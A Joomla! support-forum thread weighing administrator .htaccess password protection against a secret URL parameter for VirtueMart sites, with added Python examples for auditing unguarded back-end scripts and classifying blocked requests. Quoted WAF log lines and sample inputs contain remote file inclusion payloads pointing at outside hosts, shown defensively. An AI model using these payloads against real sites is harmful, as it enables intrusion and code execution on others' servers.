#9830 administrator .htaccess / VirtueMart front end and secret URL parameter

Posted in ‘Admin Tools for Joomla! 4 & 5’


Latest post by nicholas on Tuesday, 12 April 2011 09:04 CDT

slaes
Hey Nicholas,

Question re your thoughts on a couple of things.

A few points.

- Anyone running VirtueMart with front-end store admin, so that clients update/change their own products, cannot do this with the default .htaccess file created by AT within the administrator dir without the password for the administrator directory, obviously. This password is probably something most people won't want to provide to clients.

- Unfortunately, the way VirtueMart handles front-end admin is very poor: it calls through the admin dir.

- The workaround is to modify the .htaccess file within the administrator dir to allow VirtueMart exceptions to do its thing. Maybe this is something you might want to include in a future release of Admin Tools, as I do believe most people will want clients managing VirtueMart via front-end store admin without providing access to the password? Your thoughts?

- The other option is to not have a .htaccess within the admin dir, which brings me to my next question to you.

- Obviously you have developed both the admin dir .htaccess and the secret URL parameter. Of course, technically they are entirely different; however, in your opinion, with the secret parameter in place (and you know its strength better than anyone), could one afford to go without the .htaccess within the admin dir,

assuming of course the box is tight with regards to directory fishing etc., something a .htaccess can at times compensate for?

Thanks mate

nicholas
Akeeba Staff
Manager
IMHO, any extension which calls back-end files from the front-end over the web is inherently insecure and shouldn't be used. Well, yeah, there are not many alternatives to VirtueMart, so we'll have to put up with it.

I am not going to implement a back-end password protection exception feature for two reasons:
1. It is not guaranteed to work on all servers (especially those running on Apache 1.3)
2. Adding an exception for an inherently insecure extension completely defeats the purpose of securing your administrator area. The reason there is a back-end password protection is to prevent hackers from accessing rogue entry point scripts in your site's back-end, which is pretty much what VirtueMart does. Access to rogue scripts is a VERY BAD idea as they don't pass the request through Joomla! and the possibility of having a major vulnerability is very high. Just take a look at VirtueMart's security record and it's an immediate q.e.d. of my point ;)

I would rather have the shop owner either never manage the store from the front-end or have him provide the username and password. After all, he can save the username/password combination to his browser's keychain and not be asked about it all the time.

There is only one problem with that setup that I can think of: the PayPal integration has an IPN callback script inside the administrator area. This is completely stupid. To make it even more stupid, the damn callback script has to be called outside of Joomla!. So, if you want to use PayPal with VirtueMart, you have to screw up your site's security.

While the admin query parameter is an alternative to back-end password protection, it cannot protect rogue entry point scripts. It can only handle anything which runs through Joomla!. So, no, using the query string protection will not protect you from potential VirtueMart vulnerabilities.

IMHO, the best solution is to NOT use VirtueMart. It is a security nightmare. VirtueMart and security just don't mix. The only way to use VirtueMart is to consciously downgrade your site's security and expose VirtueMart's plethora of potentially vulnerable, directly accessible scripts to the web.

OK. Next time you hear me say "Friends don't let friends use VirtueMart" you will immediately understand what I have in mind ;)

Nicholas K. Dionysopoulos

Lead Developer and Director

🇬🇷 Greek: native 🇬🇧 English: excellent 🇫🇷 French: basic • 🕐 My time zone is Europe / Athens
Please keep in mind my timezone and cultural differences when reading my replies. Thank you!
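The "rogue entry point script" the reply above talks about is a PHP file under administrator/ that can be requested directly and runs without loading Joomla!. Joomla! code that is only meant to be loaded by the real entry points guards itself with `defined('_JEXEC') or die;`, so a quick audit is to look for back-end PHP files that lack that guard: those are the files the .htaccess password protection shields and the secret URL parameter does not. The scanner below is an added example written for this page, not Admin Tools or VirtueMart code; the sample site it builds is constructed, and `com_shop` and `notify_callback.php` are hypothetical names standing in for any payment-callback script that talks to the database without going through the framework. A hit is a candidate for review, not proof of a vulnerability, and a file can be unsafe even with the guard in place.

```python
import re
import tempfile
from pathlib import Path

# Joomla! files that are only meant to be loaded by the real entry points
# guard themselves with `defined('_JEXEC') or die;` (the entry points define
# _JEXEC before including anything). A PHP file under administrator/ with no
# such guard runs outside the framework when requested directly over the web.
JEXEC_GUARD = re.compile(r"""defined\s*\(\s*['"]_JEXEC['"]\s*\)""")

# Files that are allowed to be called directly because they define _JEXEC.
ENTRY_POINTS = {"index.php"}


def is_guarded(source: str) -> bool:
    """True if the PHP source checks for _JEXEC before doing anything."""
    return bool(JEXEC_GUARD.search(source))


def find_unguarded_scripts(site_root) -> list:
    """List PHP files below <site_root>/administrator that lack the guard.

    Returns paths relative to site_root, sorted, so the result is stable.
    A hit is a candidate, not proof: review the file before acting on it.
    """
    root = Path(site_root)
    admin = root / "administrator"
    hits = []
    for path in sorted(admin.rglob("*.php")):
        if path.parent == admin and path.name in ENTRY_POINTS:
            continue
        if not is_guarded(path.read_text(errors="replace")):
            hits.append(path.relative_to(root).as_posix())
    return hits


def build_sample_site() -> str:
    """Constructed, minimal Joomla!-like tree for the demo (not a real install).

    com_shop and notify_callback.php are hypothetical names; the callback
    stands in for any payment-notification script that never loads Joomla!.
    """
    site_root = tempfile.mkdtemp()
    files = {
        "administrator/index.php":
            "<?php\ndefine('_JEXEC', 1);\nrequire 'includes/framework.php';\n",
        "administrator/components/com_shop/admin.shop.php":
            "<?php\ndefined('_JEXEC') or die('Restricted access');\n// normal component code\n",
        "administrator/components/com_shop/notify_callback.php":
            "<?php\n// hypothetical callback: talks to the database without loading Joomla!\n"
            "$order = $_GET['order'];\n",
    }
    for rel, content in files.items():
        target = Path(site_root) / rel
        target.parent.mkdir(parents=True, exist_ok=True)
        target.write_text(content)
    return site_root


if __name__ == "__main__":
    demo_root = build_sample_site()
    for hit in find_unguarded_scripts(demo_root):
        print("directly reachable, no _JEXEC guard:", hit)
```

Run it against a real site root instead of the constructed one to get the list of back-end files that would become reachable the moment the administrator .htaccess password protection is removed or given an exception.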

slaes
You're absolutely correct; however, the issue is exactly VirtueMart and the alternatives. Or, for a better word, what alternatives? Anything else is pretty much worse and leaves Joomla users with little to no options. Your default .htaccess maker does indeed provide some exceptions to the necessary rules, to function I guess.

On the flip side, mod_sec and CSF with suEXEC do indeed provide an excellent solution with regards to remote scripts; in fact they more or less stomp them out completely.

Just for a laugh, here is an example of what I see 400+ times a day.

What advice could you provide to those who don't have the luxury of dedicated boxes with custom rule sets?

Moreover, without naming and shaming, I can think of at least a dozen hosts who claim to be secure, Joomla etc. etc., which have Joomla and VMart sites which can be compromised at will. Shame on them, not even having the basics at root level.

/content/info.html//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.lyceum1.net/plugins/ra/logon.txt?? HTTP/1.1

Access denied with code 403 (phase 2). Match of "beginsWith http://%{SERVER_NAME}/" against "MATCHED_VAR" required. [file "/usr/local/apache/conf/modsec/10_asl_rules.conf"] [line "455"] [id "340162"] [rev "193"] [msg "Atomicorp.com - WAF Rules: Remote File Injection attempt in ARGS (AE)"] [data ""] [severity "CRITICAL"]

/////?content=http://teen-37.net/myid.jpg? HTTP/1.1

Access denied with code 403 (phase 2). Match of "beginsWith http://%{SERVER_NAME}/" against "MATCHED_VAR" required. [file "/usr/local/apache/conf/modsec/10_asl_rules.conf"] [line "466"] [id "340026"] [rev "50"] - WAF Rules: PHP Injection attempt in URI"] [data ""] [severity "CRITICAL"]

http://www.ya.ru:80/ HTTP/1.0

Access denied with code 403 (phase 2). Match of "beginsWith http://%{SERVER_NAME}/" against "MATCHED_VAR" required. [file "/usr/local/apache/conf/modsec/10_asl_rules.conf"] [line "102"] [id "340012"] [rev "2"] - WAF Rules: Unauthorized Proxy access attempt"] [data "http:/"] [severity "CRITICAL"]
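The three denied requests above are blocked by one rule condition: a value that looks like a URL is accepted only if it begins with `http://%{SERVER_NAME}/`, which catches both remote file inclusion attempts in query arguments and absolute-form request targets aimed at another host (the open-proxy probe). The classifier below is an added example written for this page, not an Atomicorp or ModSecurity rule and not Akeeba code; it reimplements that logic in plain Python over request lines so the detection can be read and tested without a WAF. The first three sample lines are the ones quoted in the post; the remaining three and the `shop.example` host name are constructed to show a benign request, a percent-encoded attempt and a same-host URL that the rule deliberately allows.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed host name standing in for the protected site (%{SERVER_NAME}).
SERVER_NAME = "shop.example"

# "[METHOD] <target> HTTP/x.y"; the lines quoted in the post omit the method.
REQUEST_LINE = re.compile(r"^(?:(?P<method>[A-Z]+)\s+)?(?P<target>\S+)\s+HTTP/\d\.\d$")
ABSOLUTE_URL = re.compile(r"^[a-z][a-z0-9+.\-]*://", re.I)
REMOTE_SCHEME = re.compile(r"^(?:https?|ftp)://", re.I)


def classify(request_line: str, server_name: str = SERVER_NAME):
    """Return (verdict, evidence) for one request line.

    verdict is one of: proxy_attempt, remote_file_injection, ok, unparseable.
    Mirrors the logic of the quoted rule: a URL-looking value is only accepted
    when it begins with http://<server_name>/.
    """
    m = REQUEST_LINE.match(request_line.strip())
    if not m:
        return ("unparseable", request_line)
    target = m.group("target")

    # Absolute-form target (e.g. "http://www.ya.ru:80/") naming another host:
    # the client is trying to use this server as an open proxy.
    if ABSOLUTE_URL.match(target):
        parts = urlsplit(target)
        if (parts.hostname or "").lower() != server_name.lower():
            return ("proxy_attempt", target)
        target = parts.path + ("?" + parts.query if parts.query else "")

    _, _, query = target.partition("?")
    own_prefix = f"http://{server_name.lower()}/"
    # parse_qsl percent-decodes, so http%3A%2F%2F... is caught as well.
    for name, value in parse_qsl(query, keep_blank_values=True):
        if REMOTE_SCHEME.match(value) and not value.lower().startswith(own_prefix):
            return ("remote_file_injection", f"{name}={value}")
    return ("ok", None)


def summarize(lines, server_name: str = SERVER_NAME) -> dict:
    """Count verdicts over a batch of request lines."""
    counts = {}
    for line in lines:
        verdict, _ = classify(line, server_name)
        counts[verdict] = counts.get(verdict, 0) + 1
    return counts


# The first three lines are the ones quoted in the post above; the rest are
# constructed to show a benign request, a percent-encoded attempt and a
# same-host URL that the rule deliberately allows.
SAMPLE_LINES = [
    "/content/info.html//modules/icontent/include/wysiwyg/spaw_control.class.php"
    "?spaw_root=http://www.lyceum1.net/plugins/ra/logon.txt?? HTTP/1.1",
    "/////?content=http://teen-37.net/myid.jpg? HTTP/1.1",
    "http://www.ya.ru:80/ HTTP/1.0",
    "GET /index.php?option=com_content&view=article&id=5 HTTP/1.1",
    "GET /index.php?inc=http%3A%2F%2Fevil.example%2Fs.txt HTTP/1.1",
    "GET /index.php?image=http://shop.example/images/logo.png HTTP/1.1",
]

if __name__ == "__main__":
    for line in SAMPLE_LINES:
        print(classify(line))
    print(summarize(SAMPLE_LINES))
```

Note the limits the rule shares with this reimplementation: only query-string arguments and the request target are inspected, so a URL smuggled in a POST body, a cookie or a header needs a separate check, and the same-host allowance means an attacker who can place a file on the site itself is not caught by this condition.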

nicholas
Akeeba Staff
Manager
I'm not talking about remote script (RFI, Remote File Inclusion) attacks only. A script which doesn't go through the Joomla! framework may be susceptible to a plethora of attacks such as XSS, local file inclusion, sensitive information disclosure, SQL injection and the list goes on forever... But you are right. There are no good alternatives for Joomla! or, better said, there are no free alternatives for Joomla!. redShop does much more than VM but it costs if you want the full feature set. Tienda is shaping up to be a very solid contestant, but it's at least 1-2 years from achieving that goal. There are other cart applications but, well, they're not even comparable to VM.

Regarding the proxy requests you listed above, mod_security is the best approach. You can try writing a whole encyclopaedia of .htaccess rules, but they will slow down the site to a screeching halt.

And I fully agree with you, there are only a handful of secure hosts. The downside is that they're more expensive and people, unfortunately, still think with their wallets instead of with their heads. For instance, one very popular and very slow, insecure and bad host wouldn't be around if people would go "hey, this guy offers 100x the storage and bandwidth of the other guys at a quarter of the price; that can't be right". And right it ain't. As any old timer will tell you, you only get what you pay for. If you pay for crappy hosting that's exactly what you're gonna get. Oh, well... We can't save them all. At least we can save ourselves and our clients ;)


slaes
You're absolutely correct man, the joys of it all, man. Heaven can't help those who don't try to learn a little and understand as much as reasonably possible.

The saddest part of all is that 99.9% of attacks can be prevented with basics; the hosts just don't care and will more often than not blame account holders instead.

If someone is putting together a specific attack, have backups and run for the hills, I'll say.

nicholas
Akeeba Staff
Manager
Yes, that last line really sums it up nicely! If a real hacker puts you in his sights, all you can do is have backups and pray - unless you're a high profile governmental organisation who can afford a top notch security team, in which case you might contain the damage.

